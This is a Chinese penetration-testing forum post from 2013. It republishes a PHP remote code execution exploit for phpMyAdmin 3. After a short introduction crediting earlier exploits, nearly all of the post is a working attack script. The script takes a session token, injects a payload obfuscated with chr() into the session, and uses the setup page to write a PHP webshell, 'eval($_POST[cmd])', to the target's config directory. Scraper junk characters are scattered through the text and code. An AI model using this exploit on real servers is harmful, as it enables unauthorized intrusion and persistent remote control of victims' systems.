中国网络渗透测试联盟

标题: phpadmin3 remote code execute php版本exploit [打印本页]
作者: admin    时间: 2013-2-21 09:13
标题: phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。0 @* N* D2 {+ g8 S

, o2 o/ B+ D" ?' [昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
. J9 J5 D' {. |; p& Z" {
, s/ T$ T# w* q" u首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
5 c1 q6 z( Q/ m' A一是session.auto_start = 1;# }) C. E  o- X
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。6 |( b  T0 _4 G: Z6 G$ Z
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。6 f: n- o! A2 W; m' f
& ?4 D/ ]: \5 [" n0 f
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。! A0 ^5 f* U% m
, X+ c( }& A* [; q' I; Z, [9 S
于是写了这个php版本的exp,代码如下:
5 T3 R. g# K$ |: T, J( i5 C1 j0 y2 ~+ R$ A5 ]
#!/usr/bin/php
/ ]% m; R2 V, A<?php3 q$ o0 _3 T$ R/ Y; i) s2 I- h# G" n+ \
print_r('
) G2 L1 V( r; I+---------------------------------------------------------------------------+7 a) \6 j7 A7 |5 A! B
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]0 ?: g! s" h; U1 I$ N
by oldjun(www.oldjun.com)
6 K% `6 \6 K' b- M3 ?- [welcome to www.t00ls.net+ V6 k" h1 i9 D* I* k
mail: oldjun@gmail.com! I. }3 g7 @5 N& x8 C
Assigned CVE id: CVE-2011-25054 O  x, Y6 y4 k3 W% h! s* ?
+---------------------------------------------------------------------------+
! |& O" l  z# _0 w7 l. C; G6 c');
9 q* {0 B* y& h7 ^2 A
2 |! Q% {1 Q( M3 n% L/**
# p5 f2 f( K1 T8 p+ ?; a8 F * working when the directory:"config" exists and is writeable.4 ^5 i$ G& {7 U- x8 D
**/
1 w" a+ g6 a% y* U6 Z3 o
! T1 {+ d+ K( F! Z+ uif ($argc < 3) {
7 T6 V  c6 }0 u& F- T6 c    print_r('4 t5 I# Z" _5 L1 @0 N# J& t) d4 E$ r
+---------------------------------------------------------------------------+8 T6 ~, S( H/ V+ P( W
Usage: php '.$argv[0].' host path
  J" @1 e* p: L+ t* _$ \, J8 _0 qhost:      target server (ip/hostname)
! F( w' H) X+ S4 G: P! W/ e8 U+ _- ypath:      path to pma3% g: J4 l, n, B7 Q7 t2 J3 z/ k
Example:
6 M( `* H: D, V; Gphp '.$argv[0].' localhost /pma/
, n0 N" A+ Y5 v& N% B2 S: w+---------------------------------------------------------------------------+
* }% E: A; ^* s2 R' t; N');
$ C" r5 @7 x; @0 s% t8 x    exit;+ p- j7 D$ `5 e! E0 `; u. Z3 x
}
% j! L' {: p' ~: q. \! M0 K# {0 z& E6 l, Y% _
$host = $argv[1];7 f1 }2 @  M" X) e
$path = $argv[2];- S$ W+ Z/ y% v! ?/ y# E5 `
8 u: `& R; N3 e8 {  f! Q- r
/**: S/ L  Q# s4 B; ?  j7 p
* Try to determine if the directory:"config" exists
# y7 h1 [1 V0 }, X! t**/! F, P% h& s9 ?$ D
echo "[+] Try to determine if the directory:config exists....\n";
/ i- ]1 [+ D2 s8 U$returnstr=php_request('config/');
9 m1 P7 J' N" K& p4 r! |! z: pif(strpos($returnstr,'404')){, n: H7 p  C  j
    exit("[-] Exploit Failed! The directory:config do not exists!\n");7 b9 s7 x' f* O! r6 d0 {
}$ h' J2 j! y& \9 m; s/ X

1 D+ b, V9 H: e! Y/**& @9 x) ~* P/ E+ N0 _  ], R- r! N
* Try to get token and sessionid
+ _8 W! Q5 L. H* P0 d**/% R4 e$ v2 k4 O
echo "[+] Try to get token and sessionid....\n";
8 r9 l# j! E# p9 M' [1 D$result=php_request('index.php');2 J. k/ n! Q( K6 g( _4 N6 }: j
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);2 v% e0 _( i0 v
$token=$resp[3];. Y/ L  f* L( v5 c$ e" B' [. |
$sessionid=$resp[1];
( P8 P' C( K' }' ^if($token && $sessionid){
3 z9 N; s/ h; [) R5 q  Z) d1 |    echo "[+] tokentoken\n";3 }7 K6 b1 J: s6 E6 g) G& v
    echo "[+] Session IDsessionid\n";
. i! U2 R; F% E5 f}else{. F& _+ [3 X0 ?$ o* _9 P& |) L+ o
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
5 c, C" q7 ~, y$ H1 h* F}: P& S# T+ U, w& |
4 V# ^% Q0 y/ M( k
/**3 r! M  W+ f3 p0 b3 T( X& f
* Try to insert shell into session8 w' t' k' B2 \$ l$ j3 p
**/. ?& Z  S; }  |9 h
echo "[+] Try to insert shell into session....\n";
1 \! p; b6 }  @( i" ?. u  Dphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here., ~( T" _6 B2 O* K
3 f6 P$ e; i3 c7 |) \4 G: v: K
/**
2 a* d8 z! c! _8 U2 w3 J. k+ f/ e * Try to create webshell% d. d- R9 t( u. H& n- p4 S5 \" ]
**/
: d9 V% o' P9 S- ~0 R6 Techo "[+] Try to create webshell....\n";
5 ]6 q$ A& j4 E( i' h. sphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);: F( v6 Z) K8 E! i
/**  H& E4 ~" T; ?! R8 H
* Try to check if the webshell was created successfully
# H% }& [0 {9 @, h# b**/
9 X7 i3 R/ E  i4 \# z) j) l* @echo "[+] Try to check if the webshell was created successfully....\n";' z1 n! i: {9 a) l1 @) K1 v4 p. M
$content=php_request('config/config.inc.php');
/ j7 F; Z' p/ Lif(strpos($content,'t00ls')){. Y: P) R: b) |( A( v, g
    echo "[+] Congratulations! Expoilt successfully....\n";
% [) W" D- s$ L. P: |7 ]    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
1 k  O& _) K' C" W6 N: h8 k}else{+ C; v" m  P0 _) K7 Y- {; }
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");5 V0 Z. I1 N- z
}
  C! ]( W% g: G; x1 Q  `8 e1 q& K) m8 ]' @
function php_request($url,$data='',$cookie=''){% y: t9 F2 j1 H
    global  $host, $path;
8 v! x6 k5 @* |. e# a1 t6 F0 {   
# |4 z: n5 m, W    $method=$data?'POST':'GET';
( b, ^6 v: S, n6 S    ! o7 [& {6 b* r' y
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
- d7 D( M' g7 O$ }' e% v    $packet .= "Accept: */*\r\n";3 ^! p. V; y" f' N3 b
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";4 r9 \, o3 ~# ]. k% `
    $packet .= "Host: $host\r\n";! T% B0 A" v' ]2 J
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
: q9 f  D6 E0 ^2 D" d6 p% ?3 u: }    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
: X* v  c& H4 p3 T7 @' y    $packet .= $cookie?"Cookie: $cookie\r\n":"";  ^. D  @' Q! V8 Q0 i
    $packet .= "Connection: Close\r\n\r\n";; n* i* R+ V. j8 h% K
    $packet .= $data?$data:"";
( Z' k$ R4 A+ X4 D. T% ]" K1 Y+ [1 g: ?( |/ w
    $fp = fsockopen(gethostbyname($host), 80);
4 l' ?$ l! ^9 e2 {, j' ?    if (!$fp) {; |6 c0 V9 @5 K
    echo 'No response from '.$host; die;2 M4 v4 D, s) p0 t4 l" l& u1 x; K
    }' p7 ]- l$ S; J$ X) s  y
    fputs($fp, $packet);: S7 \3 s& o) r' A) u, s

  O7 |2 n+ e6 c    $resp = '';7 l! T5 n4 \4 W3 I6 S4 Q
2 P4 g* B) c4 Q2 A
    while ($fp && !feof($fp))
* R% o, Z' x6 d6 u5 x) r& d        $resp .= fread($fp, 1024);, ~2 g0 W  R4 D/ m) C$ ?% S

' q; \1 R3 n, h; [& F1 b    return $resp;% M$ K. j, d9 t2 F8 n
}; e1 h; ?; M0 p( ^0 S9 r
    3 V; L9 Z: U1 U. E; _% V8 h
?> / H! n3 R2 N3 Z' l0 O3 z# L
.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2